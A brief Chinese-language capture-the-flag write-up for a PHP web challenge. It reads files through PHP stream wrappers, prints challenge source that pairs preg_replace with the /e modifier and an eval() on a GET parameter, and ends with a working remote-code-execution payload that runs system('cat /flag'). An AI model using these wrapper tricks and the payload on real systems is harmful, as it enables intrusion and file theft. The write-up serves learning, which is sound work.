前言
文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!
题目
稍微审计,发现需要读到文件内容为I have a dream
,自然而然的就可以想到用伪协议来做题!
注释里提醒了next.php
,我们同样用伪协议base64加密来读文件
data://text/plain,
php://input
读到的内容解码出来
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
preg_replace的/e参数,可以造成远程代码执行漏洞具体可以参考这篇文章:
https://xz.aliyun.com/t/2557
payload:
/next.php?\S*=${getFlag()}&cmd=system(‘cat /flag’);